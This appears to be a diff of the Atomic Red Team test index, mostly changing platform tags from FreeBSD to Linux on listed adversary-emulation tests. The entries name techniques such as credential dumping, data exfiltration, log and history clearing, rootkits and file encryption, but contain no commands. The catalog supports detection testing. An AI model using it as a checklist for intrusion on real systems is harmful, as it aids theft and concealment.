- Atomic Test #4: Extracting passwords with findstr [windows]
- Atomic Test #5: Access unattend.xml [windows]
- Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux]
- Atomic Test #6: Find and Access Github Credentials [linux, macos]
- Atomic Test #7: WinPwn - sensitivefiles [windows]
- Atomic Test #8: WinPwn - Snaffler [windows]
- Atomic Test #9: WinPwn - powershellsensitive [windows]
@@ -2216,7 +2216,7 @@
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- Atomic Test #3: SSH Credential Stuffing From FreeBSD [freebsd]
- Atomic Test #3: SSH Credential Stuffing From FreeBSD [linux]
- Atomic Test #4: Brute Force:Credential Stuffing using Kerbrute Tool [windows]
- T1208 Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2229,10 +2229,10 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #2: Access /etc/master.passwd (Local) [freebsd]
- Atomic Test #3: Access /etc/passwd (Local) [freebsd, linux]
- Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [freebsd, linux]
- Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [freebsd, linux]
- Atomic Test #2: Access /etc/master.passwd (Local) [linux]
- Atomic Test #3: Access /etc/passwd (Local) [linux]
- Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [linux]
- Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [linux]
- [T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md)
- Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
@@ -2273,7 +2273,7 @@
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #1: System Owner/User Discovery [windows]
- Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos]
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
- Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
- Atomic Test #5: GetCurrent User with PowerShell Script [windows]
@@ -2316,20 +2316,20 @@
- Atomic Test #23: Active Directory Domain Search [linux]
- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #1: Enumerate all accounts (Local) [freebsd, linux]
- Atomic Test #2: View sudoers access [freebsd, linux, macos]
- Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos]
- Atomic Test #4: List opened files by user [freebsd, linux, macos]
- Atomic Test #1: Enumerate all accounts (Local) [linux]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #5: Show if a user account has ever logged in remotely [linux]
- Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [freebsd]
- Atomic Test #7: Enumerate users and groups [freebsd, linux, macos]
- Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux]
- Atomic Test #7: Enumerate users and groups [linux, macos]
- Atomic Test #8: Enumerate users and groups [macos]
- Atomic Test #9: Enumerate all accounts on Windows (Local) [windows]
- Atomic Test #10: Enumerate all accounts via PowerShell (Local) [windows]
- Atomic Test #11: Enumerate logged on users via CMD (Local) [windows]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [freebsd]
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
- Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
- Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
@@ -2353,10 +2353,10 @@
- Atomic Test #1: System Service Discovery [windows]
- Atomic Test #2: System Service Discovery - net.exe [windows]
- Atomic Test #3: System Service Discovery - systemctl [linux]
- Atomic Test #4: System Service Discovery - service [freebsd]
- Atomic Test #4: System Service Discovery - service [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [freebsd]
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
- Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #4: Packet Capture Windows Command Prompt [windows]
- Atomic Test #5: Windows Internal Packet Capture [windows]
@@ -2364,8 +2364,8 @@
- Atomic Test #7: Windows Internal pktmon set filter [windows]
- Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #9: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd]
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd]
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
@@ -2373,7 +2373,7 @@
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #1: Network Share Discovery [macos]
- Atomic Test #2: Network Share Discovery - linux [linux]
- Atomic Test #3: Network Share Discovery - FreeBSD [freebsd]
- Atomic Test #3: Network Share Discovery - FreeBSD [linux]
- Atomic Test #4: Network Share Discovery command prompt [windows]
- Atomic Test #5: Network Share Discovery PowerShell [windows]
- Atomic Test #6: View available share drives [windows]
@@ -2387,16 +2387,16 @@
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #2: System Information Discovery [macos]
- Atomic Test #3: List OS Information [freebsd, linux, macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #6: FreeBSD VM Check via Kernel Modules [freebsd]
- Atomic Test #6: FreeBSD VM Check via Kernel Modules [linux]
- Atomic Test #7: Hostname Discovery (Windows) [windows]
- Atomic Test #8: Hostname Discovery [freebsd, linux, macos]
- Atomic Test #8: Hostname Discovery [linux, macos]
- Atomic Test #9: Windows MachineGUID Discovery [windows]
- Atomic Test #10: Griffon Recon [windows]
- Atomic Test #11: Environment variables discovery on windows [windows]
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux]
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos]
- Atomic Test #13: Show System Integrity Protection status (MacOS) [macos]
- Atomic Test #14: WinPwn - winPEAS [windows]
- Atomic Test #15: WinPwn - itm4nprivesc [windows]
@@ -2410,7 +2410,7 @@
- Atomic Test #23: WinPwn - PowerSharpPack - Seatbelt [windows]
- Atomic Test #24: Azure Security Scan with SkyArk [azure-ad]
- Atomic Test #25: Linux List Kernel Modules [linux]
- Atomic Test #26: FreeBSD List Kernel Modules [freebsd]
- Atomic Test #26: FreeBSD List Kernel Modules [linux]
- Atomic Test #27: System Information Discovery with WMIC [windows]
- Atomic Test #28: Driver Enumeration using DriverQuery [windows]
- Atomic Test #29: System Information Discovery [windows]
@@ -2423,10 +2423,10 @@
- [T1580 Cloud Infrastructure Discovery](../../T1580/T1580.md)
- Atomic Test #1: AWS - EC2 Enumeration from Cloud Instance [linux, macos, iaas:aws]
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [freebsd, linux]
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [linux]
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
- Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [freebsd]
- Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [linux]
- Atomic Test #5: List Google Chrome / Opera Bookmarks on Windows with powershell [windows]
- Atomic Test #6: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows]
- Atomic Test #7: List Mozilla Firefox bookmarks on Windows with command prompt [windows]
@@ -2436,7 +2436,7 @@
- Atomic Test #1: System Network Configuration Discovery on Windows [windows]
- Atomic Test #2: List Windows Firewall Rules [windows]
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #4: System Network Configuration Discovery (freebsd) [freebsd]
- Atomic Test #4: System Network Configuration Discovery (freebsd) [linux]
- Atomic Test #5: System Network Configuration Discovery (TrickBot Style) [windows]
- Atomic Test #6: List Open Egress Ports [windows]
- Atomic Test #7: Adfind - Enumerate Active Directory Subnet Objects [windows]
@@ -2456,21 +2456,21 @@
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
- Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux]
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
- Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
- Atomic Test #6: Launch DirLister Executable [windows]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [freebsd, linux, macos]
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- Atomic Test #4: System Discovery using SharpView [windows]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
- Atomic Test #1: AWS S3 Enumeration [iaas:aws]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [freebsd, linux, macos]
- Atomic Test #1: Process Discovery - ps [linux, macos]
- Atomic Test #2: Process Discovery - tasklist [windows]
- Atomic Test #3: Process Discovery - Get-Process [windows]
- Atomic Test #4: Process Discovery - get-wmiObject [windows]
@@ -2478,7 +2478,7 @@
- Atomic Test #6: Discover Specific Process - tasklist [windows]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux]
- Atomic Test #1: Permission Groups Discovery (Local) [linux, macos]
- Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
- Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows]
- Atomic Test #4: SharpHound3 - LocalAdmin [windows]
@@ -2487,7 +2487,7 @@
- Atomic Test #7: Permission Groups Discovery for Containers- Local Groups [containers]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
- Atomic Test #2: Examine password complexity policy - FreeBSD [freebsd]
- Atomic Test #2: Examine password complexity policy - FreeBSD [linux]
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 7.x [linux]
- Atomic Test #4: Examine password complexity policy - CentOS/RHEL 6.x [linux]
- Atomic Test #5: Examine password expiration policy - All Linux [linux]
@@ -2501,10 +2501,10 @@
- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
- Atomic Test #1: Discover System Language by Registry Query [windows]
- Atomic Test #2: Discover System Language with chcp [windows]
- Atomic Test #3: Discover System Language with locale [freebsd, linux]
- Atomic Test #3: Discover System Language with locale [linux]
- Atomic Test #4: Discover System Language with localectl [linux]
- Atomic Test #5: Discover System Language by locale file [linux]
- Atomic Test #6: Discover System Language by Environment Variable Query [freebsd, linux]
- Atomic Test #6: Discover System Language by Environment Variable Query [linux]
- [T1012 Query Registry](../../T1012/T1012.md)
- Atomic Test #1: Query Registry [windows]
- Atomic Test #2: Query Registry with Powershell cmdlets [windows]
@@ -2515,7 +2515,7 @@
- Atomic Test #2: Security Software Discovery - powershell [windows]
- Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
- Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
- Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [freebsd]
- Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [linux]
- Atomic Test #6: Security Software Discovery - Sysmon Service [windows]
- Atomic Test #7: Security Software Discovery - AV Discovery via WMI [windows]
- Atomic Test #8: Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets [windows]
@@ -2529,15 +2529,15 @@
- Atomic Test #3: Remote System Discovery - nltest [windows]
- Atomic Test #4: Remote System Discovery - ping sweep [windows]
- Atomic Test #5: Remote System Discovery - arp [windows]
- Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos]
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- Atomic Test #8: Remote System Discovery - nslookup [windows]
- Atomic Test #9: Remote System Discovery - adidnsdump [windows]
- Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
- Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
- Atomic Test #13: Remote System Discovery - ip route [linux]
- Atomic Test #14: Remote System Discovery - netstat [freebsd]
- Atomic Test #14: Remote System Discovery - netstat [linux]
- Atomic Test #15: Remote System Discovery - ip tcp_metrics [linux]
- Atomic Test #16: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
- Atomic Test #17: Enumerate Active Directory Computers with Get-AdComputer [windows]
@@ -2548,7 +2548,7 @@
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- Atomic Test #3: Port Scan Nmap for FreeBSD [freebsd]
- Atomic Test #3: Port Scan Nmap for FreeBSD [linux]
- Atomic Test #4: Port Scan NMap for Windows [windows]
- Atomic Test #5: Port Scan using python [windows]
- Atomic Test #6: WinPwn - spoolvulnscan [windows]
@@ -2569,7 +2569,7 @@
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- Atomic Test #3: System Time Discovery in FreeBSD/macOS [freebsd, macos]
- Atomic Test #3: System Time Discovery in FreeBSD/macOS [linux, macos]
- Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
- Atomic Test #5: System Time with Windows time Command [windows]
@@ -2699,10 +2699,10 @@
- Atomic Test #7: Azure AD - Delete user via Azure AD PowerShell [azure-ad]
- Atomic Test #8: Azure AD - Delete user via Azure CLI [azure-ad]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [linux]
- Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [linux]
- Atomic Test #5: PureLocker Ransom Note [windows]
- Atomic Test #6: Encrypt files using 7z utility - macOS [macos]
- Atomic Test #7: Encrypt files using openssl utility - macOS [macos]
@@ -2712,11 +2712,11 @@
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux]
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with SysInternals SDelete [windows]
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos]
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos]
- Atomic Test #3: Overwrite deleted data on C drive [windows]
- Atomic Test #4: GCP - Delete Bucket [iaas:gcp]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2736,14 +2736,14 @@
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [freebsd, linux]
- Atomic Test #7: Reboot System via `halt` - FreeBSD [freebsd]
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos]
- Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [linux]
- Atomic Test #7: Reboot System via `halt` - FreeBSD [linux]
- Atomic Test #8: Reboot System via `halt` - Linux [linux]
- Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [freebsd, linux]
- Atomic Test #10: Reboot System via `poweroff` - FreeBSD [freebsd]
- Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [linux]
- Atomic Test #10: Reboot System via `poweroff` - FreeBSD [linux]
- Atomic Test #11: Reboot System via `poweroff` - Linux [linux]
- Atomic Test #12: Logoff System - Windows [windows]
@@ -2789,11 +2789,11 @@
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Create local account (FreeBSD) [freebsd]
- Atomic Test #9: Create local account (FreeBSD) [linux]
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #12: Login as nobody (Linux) [linux]
- Atomic Test #13: Login as nobody (freebsd) [freebsd]
- Atomic Test #13: Login as nobody (freebsd) [linux]
# exfiltration
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2807,12 +2807,12 @@
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #1: Exfiltrate data HTTPS using curl windows [windows]
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd]
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux]
- [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md)
- Atomic Test #1: C2 Data Exfiltration [windows]
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #3: DNSExfiltration (doh) [windows]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2821,18 +2821,18 @@
- [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
- Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd]
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd]
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [freebsd, linux]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
- Atomic Test #6: MAZE FTP Upload [windows]
- Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
- Atomic Test #8: Python3 http.server [linux]
- Atomic Test #9: Python3 http.server (freebsd) [freebsd]
- Atomic Test #9: Python3 http.server (freebsd) [linux]
+226 -111
View File
@@ -5,20 +5,24 @@
- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
- Atomic Test #3: Malicious PAM module [linux]
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux]
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- Atomic Test #10: chflags - Remove immutable file attribute [linux]
- Atomic Test #11: Chmod through c script [macos, linux]
- Atomic Test #12: Chmod through c script (freebsd) [linux]
- Atomic Test #13: Chown through c script [macos, linux]
- Atomic Test #14: Chown through c script (freebsd) [linux]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
@@ -28,17 +32,26 @@
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Sudo usage (freebsd) [linux]
- Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd]
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
- [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: rm -rf [linux]
- Atomic Test #5: Truncate system log files via truncate utility (freebsd) [linux]
- Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [linux]
- Atomic Test #10: Overwrite FreeBSD system log via echo utility [linux]
- Atomic Test #13: Delete system log files via unlink utility (freebsd) [linux]
- Atomic Test #18: Delete system journal logs via rm and journalctl utilities [linux]
- Atomic Test #19: Overwrite Linux Mail Spool [linux]
- Atomic Test #20: Overwrite Linux Log [linux]
@@ -47,19 +60,28 @@
- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear sh history (rm) [linux]
- Atomic Test #3: Clear Bash history (echo) [linux]
- Atomic Test #4: Clear sh history (echo) [linux]
- Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #6: Clear sh history (cat dev/null) [linux]
- Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #8: Clear sh history (ln dev/null) [linux]
- Atomic Test #9: Clear Bash history (truncate) [linux]
- Atomic Test #10: Clear sh history (truncate) [linux]
- Atomic Test #11: Clear history of a bunch of shells [linux, macos]
- Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux]
- Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
- Atomic Test #15: Disable Bash History Logging with SSH -T [linux]
- Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos]
- Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos]
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
